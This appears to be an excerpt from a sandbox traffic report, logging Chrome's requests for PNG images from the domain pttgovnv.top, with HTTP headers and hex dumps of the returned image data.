          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6uo0l2C0QAKQAC3%2BRHgE8j%2FRuo3wzC1Z5Bk2F0pDsKLFEABDmSTVoF7j5ys18bWfcfMwzrL%2Bo31Ro8LXTW%2FxAz%2BKnSEZC90cIKeHc1kl9yw1kqaqn6I2%2FE9OIavke0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad255a49425b-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 5b 28 49 44 41 54 78 da ec bd 7f 88 63 db 7d e0 79 ae aa c3 e6 85 81 aa c7 fc 31 ed c1 4b cb 79 0f 4c c0 d0 6a c6 2c 31 76 5c 6a 86 90 b0 93 a1 ab 5f 63 9c 64 02 a5 ee f6 1f 5e 70 e8 ea cd 06 ff 88 b3 ad 5e db f9 c1 24 69 35 09 24 7f f8 bd 52 41 c6 b1 d7 74 77 35 c9 2e 33 13 c2 53 39 0e 09 83 e1 55 91 40 30 3c fb a9 20 c4 3d 2c c1 55 30 e4 25 b8 4b 77 ef f7 ea 7b 5a 47 47 e7 4a 57 d2 55 49 aa fa 7c 40 5d 5d 2a 49 f7 de 73 af 74 3e fa 9e 73 be df 28 8e 63 03 00 00 00 00 cb 45 84 c4
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<[(IDATxc}y1KyLj,1v\j_cd^p^$i5$RAtw5.3S9U@0< =,U0%Kw{ZGGJWUI|@]]*Ist>s(cE
          2024-09-01 22:25:27 UTC1369INData Raw: c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 48 1c 00 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00 00 00 12 87 c4 01 00 00 00 20 71 00 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 80 c4 01 00 00 00 00 12 07 00 00 00 00 48 1c 00 00
          Data Ascii: HH qH q qHH qH q qH qH q qH qH
          2024-09-01 22:25:27 UTC1369INData Raw: 01 fb d1 02 24 e2 25 5f e1 64 1e 5e ee 17 49 e4 6a d2 05 29 05 6c a3 f1 e2 38 56 a2 ff 3a 20 b9 22 68 51 fa 98 eb 19 02 fb e1 40 3b 7f 67 d8 62 05 8d 50 7e b3 10 b1 2a 45 4d 4f 9e 9f 27 c7 7a d8 37 d7 4e 86 f6 93 e3 63 35 ec 04 cd 4b 13 8c 2d 70 4f 97 35 2a a0 c3 53 55 4d a7 70 16 45 ae 9e fc c8 fa b6 2c 22 d7 f0 db 82 ab 7d 69 b8 96 dc 5a 0c af 16 22 4a 47 01 09 d8 59 88 7d 8b cd 17 02 f7 46 e9 9c aa 49 89 cc 2f 0d dc 77 d2 39 58 b6 d3 96 0a ce 49 fc 63 69 2b 0d 1c 63 f4 e3 99 02 1b 5a c8 d0 89 4f e5 0b 6d 3a 94 eb 4b 78 27 fe 8b e4 f6 2b 23 65 0f 90 b8 71 a4 cd 8a 8d ae da cb 92 34 f9 a6 5a 5b b2 63 2b ab b0 d4 75 df 65 c8 f1 9d e4 f7 fd 33 da 21 ca 10 f8 71 c6 df ee 38 e2 26 e7 b8 21 f3 1d cf aa d4 9e 41 2e 9b 6e 1a 19 98 4a 94 e2 3f 18 10 81 95 d2 7a
          Data Ascii: $%_d^Ij)l8V: "hQ@;gbP~*EMO'z7Nc5K-pO5*SUMpE,"}iZ"JGY}FI/w9XIci+cZOm:Kx'+#eq4Z[c+ue3!q8&!A.nJ?z
          2024-09-01 22:25:27 UTC1369INData Raw: 2a 94 70 99 ad bf 98 22 b2 f4 8a a4 61 c9 7d 0b a5 f6 18 c5 4a 69 23 91 9f 07 7d b7 95 d2 67 52 f9 0a 17 ad 8f cd f3 ce cf 85 2a 2e 0c bc bf a4 be ea 49 67 78 ff 95 ca 5c 49 64 ee 07 53 e6 e5 1b 4c 2b 32 2c 02 1a 3a cf 2b a5 cb a4 1b 41 e2 5c 42 df ee 5d 89 73 3b 6b 89 4e 5d 71 04 6e 4d 1f 7b 30 cb e1 35 11 45 8d 6c 6d a9 30 3e b1 f5 23 93 ff df 31 81 44 a7 ba c2 f6 b2 ca d8 9a 46 a0 e4 b9 0f 9d 08 93 ec b3 bb 24 5d 7e 97 a8 dd ba 76 98 37 55 58 9a 59 fb a5 f2 2a 8f 97 f9 65 2f 27 b7 f7 e9 f3 64 7b db 9a 6b 6d 61 3a 53 3d 4f 22 02 f7 5c c9 d4 55 c8 37 73 4a 9c 31 4c 9e 9f 97 cc c9 79 c9 9b 7c b6 42 ab 4d d9 e6 69 12 59 af 83 97 0e 7d ce 09 80 83 13 df bb 92 f0 4b a3 45 22 2d e3 e4 cb c2 e7 cf c4 09 93 95 bb 27 9d bd 44 e0 de 97 47 e0 3c 91 fb 8d e0 ca df
          Data Ascii: *p"a}Ji#}gR*.Igx\IdSL+2,:+A\B]s;kN]qnM{05Elm0>#1DF$]~v7UXY*e/'d{kma:S=O"\U7sJ1Ly|BMiY}KE"-'DG<
          2024-09-01 22:25:27 UTC1369INData Raw: 73 d3 99 e4 df d6 79 63 f6 75 65 5f 45 78 64 9b 07 ba bf 6d bd d9 a8 e2 22 2e 6e b0 f3 df 42 e5 b7 a4 bd f7 03 91 b5 d6 08 a1 78 21 bc 00 13 f0 a1 82 5f ef fb 85 ef e1 49 fc b9 50 67 3c d7 56 4b 73 c6 0d ec d3 a7 02 62 73 d9 7b de bb 13 0d 6d 2e 9e c8 35 06 e4 7a 56 05 e3 3b f1 bf 35 e1 a1 d5 0f 0d f9 82 f1 ab c6 4f 2b d2 3d 47 6b 63 dd 42 af 91 c8 2a 1f 1b e7 44 e2 54 42 36 6d 22 d1 8c 95 85 fb de 73 6c 02 5c bf c6 9e 44 64 36 0a de bf 35 8d 0c 6d aa 00 d9 22 f4 0f 1c 69 ac 27 3f 2b ba e8 41 de 48 6f e9 4d 24 e9 a9 23 6c 5b c6 29 e6 3e 4e 1b 89 74 e9 e2 84 86 e6 7f ab ea 9f ed 42 8b 96 8a 66 c5 11 e1 ba 6e ef b2 b6 97 1d 3e 95 c7 6c ab dc 35 17 f2 03 30 bb 8e aa 1c d7 13 2f d7 5d 6b 84 f0 1a 43 c9 27 c8 c7 5f 0e 76 76 d1 fb 27 7e b5 28 ba 1c 88 32 15 1e
          Data Ascii: sycue_Exdm".nBx!_IPg<VKsbs{m.5zV;5O+=GkcB*DTB6m"sl\Dd65m"i'?+AHoM$#l[)>NtBfn>l50/]kC'_vv'~(2
          2024-09-01 22:25:27 UTC1369INData Raw: 17 77 fe d9 5a 41 73 bb aa 8e a4 5d 52 79 ac 98 fe 39 6a 36 6d 88 ec e0 75 a7 60 bd 7b 5c b6 6a c2 ba e9 4d 60 3e d0 8e 6b 57 9f df f2 f7 59 87 0c 77 b5 5d 36 66 39 5f 4d 5f bb ae 73 0c 65 9b b2 da f3 45 9b 7a c7 b4 a5 1d b3 5d 48 52 55 09 6a 8d 33 4f af 00 24 cd cb 96 8a dc 96 e6 e8 6b 38 fb 55 d7 5b 28 79 71 39 70 ae 9b 7c 94 14 fe be 96 eb fe 4e 8e 87 2e fc 10 7e 9a b2 a1 14 bd 33 10 dd e8 a6 55 f8 f3 8b b7 1f 4b 49 a7 6f 9b de 64 f2 d5 e4 fe f7 9b 0b a5 97 c2 22 13 3f d7 5a a7 a7 12 f9 49 3a ff a7 49 67 bd 10 49 ae 45 24 12 d1 78 d6 27 6d 52 1a 6a 06 22 d1 df 53 96 1e 24 d7 e4 83 b1 9e 73 d2 d9 4b cb 5b cd a6 0d 8e 06 16 ba 74 d3 c0 34 02 82 f7 de ee 63 a3 db c9 6f b7 d3 eb 2d 36 7f 9f 5c 47 7f 97 eb 7a eb 5e c3 f7 03 42 35 98 56 a4 c8 1a b5 b2 1a 77
          Data Ascii: wZAs]Ry9j6mu`{\jM`>kWYw]6f9_M_seEz]HRUj3O$k8U[(yq9p|N.~3UKIod"?ZI:IgIE$x'mRj"S$sK[t4co-6\Gz^B5Vw
          2024-09-01 22:25:27 UTC1369INData Raw: 3b a3 40 74 21 4d 0b e2 24 0a 3e c8 29 70 65 a7 23 2a 6b 0a 10 4b 6b 8e 6d bf a5 92 74 49 25 76 3f 23 32 63 4c 2f df dd 6c a3 21 dd c5 24 6e 69 99 b4 26 ac 4d 19 a2 fb 58 f3 a2 45 15 3e 32 16 06 44 0b 00 90 b8 33 7a 5c 7e 67 7b df 89 cc 85 04 ee d8 2c c0 fc 1a 8d 0e 5d 56 71 d8 d7 9b 4d 35 92 07 2b 80 36 d2 57 d5 ce 6e 6f 9e 13 c0 9d e4 ba 69 4d 5a 6f 81 c0 9a 23 51 a7 5d 22 c7 17 6a d9 87 17 ab 6a 55 f4 1e 3a fb bb c6 47 c6 42 b0 77 ca 29 69 00 00 90 b8 53 c4 ed 6c 8f 9c e1 b9 90 c0 a5 f2 b3 08 b5 3f 55 1a 5e 4e 6e 32 d7 e3 48 65 ae 96 47 c0 54 00 65 78 ac a6 bf cb f3 65 e8 af 6d 16 a0 b2 80 9d 23 a7 6d 5f 77 fe 54 73 16 34 34 75 df 5b 7a df ac 23 5f b6 06 ad 4b 5a 41 c3 29 7a 5f e7 63 62 a1 38 1e e3 4b 0d 00 00 12 b7 e4 6c 8d 10 b8 e3 39 76 d4 d5 0c d9
          Data Ascii: ;@t!M$>)pe#*kKkmtI%v?#2cL/l!$ni&MXE>2D3z\~g{,]VqM5+6WnoiMZo#Q]"jjU:GBw)iSl?U^Nn2HeGTexem#m_wTs44u[z#_KZA)z_cb8Kl9v
          2024-09-01 22:25:27 UTC1369INData Raw: 42 5e 4b 22 42 db fa b8 96 de da ce 7e 58 01 a9 eb 36 5a c3 d2 34 e8 bc c0 0d 33 5e d4 6a 16 12 77 cf 69 9f 07 ba 3f 5b 7a cc 65 3d 9f 0d 15 d3 a7 fa 58 29 2b b6 1b 90 35 1b 99 1d 67 a5 a8 b4 e1 ba 5c 1b 56 06 75 a5 ec 7d 67 df b6 bd 6d 18 ef 4b 01 00 00 c0 a9 b1 8c 73 e2 56 43 9d a6 76 bc 76 08 ee 8f 4d ff ea c2 9a 23 2d b6 ce a8 99 26 07 95 4a d2 1d 95 b3 a7 2a 62 6b 2a 97 7b 8e 54 c8 ef 07 2a 96 92 fb aa a1 f3 f2 64 c8 53 e6 a4 95 75 91 c1 55 15 18 1b 95 12 09 79 d3 11 c0 9b 2a 33 0f 1d f1 b1 d1 b6 3b 76 9f 9c f9 63 4d 6d 8f 5a 68 92 bf 44 8e 92 9b 3c e6 1d 6d ab d6 1c cf a9 bb 6d 69 af 63 1d 8e ac a8 84 1e e9 b9 aa 6a 5b 54 f5 b1 65 3d de 7d 6f 61 c6 91 3e 6e 1c b1 6a eb cf 86 77 5d d5 1d 01 b7 1c 07 2a 7d 6c 78 c7 00 00 00 30 53 2e 2c f1 be 5f 0a a4
          Data Ascii: B^K"B~X6Z43^jwi?[ze=X)+5g\Vu}gmKsVCvvM#-&J*bk*{T*dSuUy*3;vcMmZhD<mmicj[Te=}oa>njw]*}lx0S.,_
          2024-09-01 22:25:27 UTC1369INData Raw: 5c 2e fc ce 60 d5 4b d2 da 72 3a 5c b7 83 ba 54 40 47 2b 72 22 73 a5 6c 25 86 9a d3 f1 c9 82 02 3b e1 fe c8 d9 d7 8a 3e ef a1 15 b9 e4 f9 15 dd af aa e9 2d 5e d8 74 3b 51 27 41 f0 91 23 77 2d 1b 65 72 16 34 dc 0b 88 48 db 3e c7 95 26 ad 24 61 73 ce 55 4d 6f 5e df ae 0e 4b 37 27 14 00 7b 1c f6 75 fd b6 7e 53 7f d6 cc f0 f9 6e 6b 3a 57 f0 40 db a2 62 7a 79 e3 ac c0 35 1d 79 92 c8 98 54 6a 78 cb 91 d5 69 86 f0 5a 9e c4 a5 95 2f 74 85 aa bd a6 aa ce 71 d7 02 c7 6a 96 6d 3e 98 9e bf 59 25 7b be ac 5f 76 6a 7c dc 26 9c 74 dc b9 b8 ab 89 f0 94 13 01 f8 9f 86 8a cf 4a a9 92 88 d4 af 8f 9a ab 96 0a 5c 29 7a 25 53 91 3a f1 77 65 ce 5b f2 bf 7d 1b 5d 4b e5 24 4a ae 79 3b 67 2e 5b 24 ff bf 91 db bf f9 e8 cb c9 63 d7 82 db 3e e9 1c 24 ff ca 17 ac 74 31 43 3a dc 6b cc
          Data Ascii: \.`Kr:\T@G+r"sl%;>-^t;Q'A#w-er4H>&$asUMo^K7'{u~Snk:W@bzy5yTjxiZ/tqjm>Y%{_vj|&tJ\)z%S:we[}]K$Jy;g.[$c>$t1C:k
          2024-09-01 22:25:27 UTC1369INData Raw: a4 59 b1 f2 26 d2 b8 a5 72 ed 56 83 b8 a7 51 33 a3 bf ef 99 8c d5 a9 4e c4 6f df 89 28 da 39 77 76 61 87 9b e4 b8 66 7a 39 dc 5a 33 b8 b6 42 43 c9 ee 97 84 ac 72 5e 87 4b b6 a8 a1 36 e6 e3 ed 17 96 7d 15 f1 b2 09 0f 29 67 71 6d 54 12 6c b0 a2 10 ff 75 e2 0e a3 57 99 96 a2 4f 85 9e 2d 73 e0 a6 14 c9 43 49 6f 22 8b 1a 3c 91 7c 29 77 b4 a9 fb d8 e5 4e bd d1 95 56 57 6e 8f ec f1 a4 b2 7d fb f1 76 df d0 77 37 dd c8 25 2a 51 00 12 37 be c4 85 be e9 57 27 8d 94 a8 80 dc b3 02 a7 72 51 b6 b2 a1 f5 3c 67 d6 61 eb 50 a4 1d 1e b5 c2 64 4c 6f d5 e6 86 6e df 0e 59 4a 48 ae a2 c3 bc 2f e4 cd 0c 26 3c f6 65 b1 a2 af 2f 11 b4 3b 1a 35 6b 99 de 2a 57 63 7a c3 c5 55 a7 d3 16 99 6c 7a 79 ee 8e 54 7c 6d 79 30 5b da cb 98 e1 e9 45 6c 24 c1 6e 53 8e d5 ae f2 b5 c3 b5 56 ac ee
          Data Ascii: Y&rVQ3No(9wvafz9Z3BCr^K6})gqmTluWO-sCIo"<|)wNVWn}vw7%*Q7W'rQ<gaPdLonYJH/&<e/;5k*WczUlzyT|my0[El$nSV


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          98192.168.2.449842172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:27 UTC599OUTGET /help/layout/images/52.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:27 UTC728INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:27 GMT
          Content-Type: image/png
          Content-Length: 21895
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"5587-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36236
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emdlFOf%2BZRYLH8whz330oOzVf4LHgWrQRwNrRRfpd7w9roDa0z2qFV9nnDVzIiYcQz%2FT7A5fA5pXNwjW3RMJFjtpubxJ%2FQWnQn8gmqHTr%2BZK8sHxwoxcUhvI%2FJHVyyE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2559e87d13-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:27 UTC641INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 55 14 49 44 41 54 78 da ec bd 4f 8f 23 49 17 af 15 33 8c 90 90 90 aa 5e 84 e6 22 dd 45 e5 88 0d 42 88 f2 a0 17 b1 01 55 f6 f2 02 9a 72 4b 17 84 10 52 65 6f d8 a1 76 8b 2d a2 5c 9f a0 dd ba 1f a0 b3 24 16 77 37 ee 61 81 58 b5 6b 07 d2 48 e3 e2 0b 8c 6b c1 82 77 33 2e 56 2c 40 8d 4f f5 89 f6 a9 a8 c8 7f 76 da 4e db cf 23 a5 aa db 7f d2 99 91 11 27 7e 71 e2 c4 89 ef be 7c f9 e2 00 00 00 00 60 bf f8 9e 22 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<UIDATxO#I3^"EBUrKReov-\$w7aXkHkw3.V,@OvN#'~q|`"@"q8
          2024-09-01 22:25:27 UTC1369INData Raw: 00 00 10 71 00 00 00 00 80 88 03 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 11 07 00 00 00 00 88 38 00 00 00 00 40 c4 01 00 00 00 20 e2 00 00 00 00 00 11 07 00 00 00 00 88 38 00 00 00 00 44 1c 00 00 00 00 20 e2 00 00 00 00 00 11 07 00 00 00 00 88 38 00 00 00 00 44 1c 00 00 00 00 20 e2 00 00 00 00 00 11 07 00 00 00 80 88 03 00 00 00 00 44 1c 00 00 00 00 20 e2 00 00 00 00 10 71 00 00 00 00 80 88 03 00 00 00 00 44 1c 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 80 88 03 00 00 00 00 44 1c 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 80 88 03 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00
          Data Ascii: q@"q8@"q8@"8@ 8D 8D D qD"qD"q@"q
          2024-09-01 22:25:27 UTC1369INData Raw: f7 e5 cb 97 7d 13 71 22 7e ec ee 0b af 24 ad 85 7a d9 fe d2 d7 6e ad 88 52 51 23 2b 53 4f 5b be 96 54 05 87 08 2e 49 5f 72 66 fe 4a 1c 5e 6a 84 de 44 3f 3b d3 7f 8f 54 68 c5 84 d9 a9 0a be 81 0a 85 91 36 ba 34 10 86 5e c0 85 f7 db f3 82 72 f1 5a 7f 47 cf 49 ae 5d 62 ff de 78 a1 aa f7 35 d2 f2 ba f1 22 53 f6 5a 75 cf 57 13 ff 64 bc ab 5d a8 73 5e a8 57 6d 43 f3 b8 ae 78 56 0f 66 58 4f 7d 7c 64 28 6e ff cf c5 f1 4f e5 59 9b 32 f6 d7 9a 97 e5 43 d4 f4 35 45 62 79 aa 1e e1 75 ca cc 9e 3f 7a be 8a 6b a8 cb c4 b7 a9 26 75 c6 94 d3 36 ee df 79 5b 00 d0 05 7e fc ed f7 d0 e6 46 f9 c7 2f 7f ff 8e d2 ea 36 3f ec e1 35 3f 33 fa 9a 97 cc b9 a5 17 ee 83 35 c0 2a e0 ae 5c 3c e5 c5 2a c6 d9 c6 aa 8d b4 c3 7d d4 ce 64 a8 7f 45 c8 25 da 51 cc 54 50 49 e7 2e b9 d1 a4 33 1e
          Data Ascii: }q"~$znRQ#+SO[T.I_rfJ^jD?;Th64^rZGI]bx5"SZuWd]s^WmCxVfXO}|d(nOY2C5Ebyu?zk&u6y[~F/6?5?35*\<*}dE%QTPI.3
          2024-09-01 22:25:27 UTC1369INData Raw: d6 ff de 40 85 e4 c8 75 68 cb 31 33 b5 9c 9b 67 f6 b4 00 40 c4 ea e2 bd 4f 2e 9e 62 c3 8a 9d e1 16 2e d5 8a c5 a6 53 f1 31 c3 77 51 52 c7 12 d7 6c 41 c3 34 b8 b6 bb e0 37 63 af 1d 3c ea 05 bd 2f f1 32 64 ae e5 44 df 00 7b 48 13 8f 34 22 0e 11 b7 b6 88 2b e2 51 13 fc 8e 5d 7c 0a 35 5f 43 b8 79 31 24 95 fd 2a e8 d8 1f 4d 23 c8 b5 92 8b 08 19 69 3a 93 a9 8a a6 cc 08 8e b1 9e d7 0b ac 44 5f bb 75 cb fc 75 a7 fa bd 95 3d 2f da e1 8f f4 5a fc 6f 5f ca bf ab ca c3 df f3 36 a6 5e 8d 90 1b 1b f1 72 ae 1e cb 71 47 44 9c bd de a6 1d ff ac a5 7a 3e 2a b8 9e 81 2d cb 70 64 1d 7b ed 88 98 96 88 38 a6 53 01 9a d9 86 29 c5 d5 7d 3a 39 9d 1a c4 08 25 31 2f 85 ae 42 b5 1d be 08 ac d7 2d 4c a1 8a 48 78 af 46 df 07 e4 3f 68 e7 70 62 84 56 aa 1d f0 2b 23 ce e4 b7 df 6a e5 4f
          Data Ascii: @uh13g@O.b.S1wQRlA47c</2dD{H4"+Q]|5_Cy1$*M#i:D_uu=/Zo_6^rqGDz>*-pd{8S)}:9%1/B-LHxF?hpbV+#jO
          2024-09-01 22:25:27 UTC1369INData Raw: d4 43 76 d6 d0 31 b1 ca fb 27 0e 8f 37 22 ae a6 f1 1e ba 97 9b a5 0f 76 35 da 56 91 99 b9 8a e0 7f ed f0 47 e6 73 72 1f d9 0a bb 02 b4 2d a6 52 4d f9 91 fa 11 9b f1 d4 3d ed 52 d1 b6 c8 d4 67 35 8c 18 81 49 51 62 62 23 d6 bb 44 ee e2 53 a3 4f cf 37 52 27 07 25 82 ef 67 8d a3 1c 6a 9c 62 d1 8a dd eb 6d 27 3d ee da a0 ce ac fc 7e 5b f2 d1 0f 6d 6c bf 07 b0 e7 a4 0d 3f 5f ea 89 fb c7 2f 7f 2f 7b ff 92 15 ab 88 b8 49 85 01 17 4f d6 75 e8 bd d8 64 ae b5 00 19 d5 84 1d b3 88 91 51 8d e9 50 e9 50 a6 7a ad f2 9d c9 8e 05 9c 17 53 7e f1 82 17 6f 0f a6 f1 e7 9b 12 c7 ea b5 fc d4 70 34 37 eb 4a 45 8d ec 1a 62 b9 0f bd b2 25 0b 1a 9e ca 3a 9c 86 37 42 3a 46 df 1d 36 32 95 3f 09 8e b9 ae fc fe ac e2 ad 48 3c cb 22 a1 57 6b e6 8b 04 38 14 9a d8 8a c7 0a 91 66 db 58 d9
          Data Ascii: Cv1'7"v5VGsr-RM=Rg5IQbb#DSO7R'%gjbm'=~[ml?_//{IOudQPPzS~op47JEb%:7B:F62?H<"Wk8fX
          2024-09-01 22:25:27 UTC1369INData Raw: a2 53 49 4a 3c 04 ab 82 b8 db 0c 9d 8b 37 8c cc 56 d4 0a 23 d0 74 35 e1 54 ab 0d 05 c8 6b d8 83 6f e5 52 30 68 92 7a 68 b7 cb 3b 69 38 b8 1d 05 b6 7d 5a e3 be 26 2b 86 98 b4 39 cb 70 52 e5 75 8a 88 d1 a4 64 10 5b f4 9d 36 44 66 1d 26 2d 57 db 13 76 71 38 1e 11 f7 b4 39 6f 90 1f 2c f4 ba d8 ce d2 76 f4 99 5b 63 05 a5 18 25 2f 22 54 0c ca b9 7e 56 11 f9 a0 ff bf 56 63 27 c6 4f 44 e3 44 ff ff 10 4e 69 a9 a8 cc 55 fc f9 55 9f 89 11 6e 67 e6 3e 7d 42 dd 6b 1d 7d 7e 57 60 98 52 b7 bd 29 ce b1 5b 4e 55 c8 7d de eb 88 3f 51 a3 35 90 ad a1 d4 98 ff a5 c6 4b 3e 27 d3 c4 3d 4d eb 30 6c 60 40 a6 56 18 a9 28 f6 02 fe cc 18 f8 bb 60 d4 9a 9a 01 c0 b6 88 ad 12 b5 a3 e7 ad 8a aa 35 7f 6f 5a 31 a8 6a 63 60 06 cd 3d 1c 65 5e 8d 93 a0 9d ac 7a 1e 5b 87 a6 35 ea d8 63 60 6f
          Data Ascii: SIJ<7V#t5TkoR0hzh;i8}Z&+9pRud[6Df&-Wvq89o,v[c%/"T~VVc'ODDNiUUng>}Bk}~W`R)[NU}?Q5K>'=M0l`@V(`5oZ1jc`=e^z[5c`o
          2024-09-01 22:25:27 UTC1369INData Raw: 1b b9 ff cc bd 5c 49 3f 6b a9 4d b6 21 74 26 a6 0e d6 8d 6b 6a 3c 35 2c 03 3c 1d 00 7b 9b 77 59 70 dd d3 48 7b 68 53 50 e6 6a b7 ce 56 ad d3 0d 7e 6b 62 56 f5 5f 05 83 9a 71 c5 35 fa 18 6b db 47 ac b4 b5 de 0a a9 45 10 71 7b 4c 57 3c 71 d6 c8 9d 05 ae 64 a9 dc 0f 5e 34 45 e2 93 6a 0b 06 35 2a 3e 48 5f 1a f6 1f 6e e9 ee 4f f5 48 54 84 4c 54 78 3d ba 65 06 6f 9f e7 2d 37 8b 19 7c 8a 90 d4 78 a8 24 96 ee d4 4c 9b fa 3d f5 64 74 7a a3 a2 e5 c1 88 36 89 ab 90 29 d8 9f d4 c3 37 52 51 79 a3 23 b9 f1 3a d3 11 1a a7 96 e9 b5 ce 4c 2e b7 ac 62 b4 3e d4 eb 97 7b 16 01 22 d3 bd 7f aa e8 cd f5 9e ee 34 f6 c4 c7 04 be 5e b3 83 ba 0c bc 9f e3 c0 93 b3 35 af 64 90 97 2b 64 95 dd 42 ea 24 b1 8e 89 02 cb 43 5b 3b 19 a8 b8 b8 2d 13 8f 4d ea 9e 5e eb fb 0a af 54 67 50 71 56
          Data Ascii: \I?kM!t&kj<5,<{wYpH{hSPjV~kbV_q5kGEq{LW<qd^4Ej5*>H_nOHTLTx=eo-7|x$L=dtz6)7RQy#:L.b>{"4^5d+dB$C[;-M^TgPqV
          2024-09-01 22:25:27 UTC1369INData Raw: 66 08 b5 7d a5 a6 33 5d 25 35 82 4f 7e 9d 6f f8 3a 7b 3a 70 1c a8 28 b9 54 fb 39 33 02 e7 ce 95 78 c7 8d 70 97 f3 c8 e2 16 f1 f0 7f d4 ef 59 cf fe ad 6b b0 80 a7 84 4c 6d cd 59 85 90 9b 18 a1 f6 ab f1 7c 26 e6 bb b7 6e b5 1d 52 06 46 c4 f9 a4 ed 31 bb 72 6e bc 76 21 37 de d6 cb 40 45 db f1 b5 8a b9 b0 0f fb 10 7a 4a 03 a1 27 42 ee 5a ed b0 2f ef 47 b7 4c a0 be 0a 4d 45 dc 5d c3 67 08 1d e3 bb 2f 5f be 74 e2 42 54 68 85 a9 23 de 98 95 8f d2 88 ff 0c de 7f 5d 15 83 a5 e7 ed b9 92 74 1f 2d de 83 ef 00 67 6a 74 4e d5 6b 37 31 a3 db b1 8e d2 c7 c1 e7 5f 78 be cc c8 d3 8f 9a c7 25 d3 b2 89 f1 5e 8e ad 91 53 83 7f 6d 8c c4 49 99 b7 40 3c 90 12 af a7 d7 d7 37 9e 4a 3f fd ec bd 86 7e a4 df 6b a9 ec 3e 96 3c ff b9 7b 39 dd f7 d3 1e c4 5c 55 09 46 2f f8 cf 03 31 30
          Data Ascii: f}3]%5O~o:{:p(T93xpYkLmY|&nRF1rnv!7@EzJ'BZ/GLME]g/_tBTh#]t-gjtNk71_x%^SmI@<7J?~k><{9\UF/10
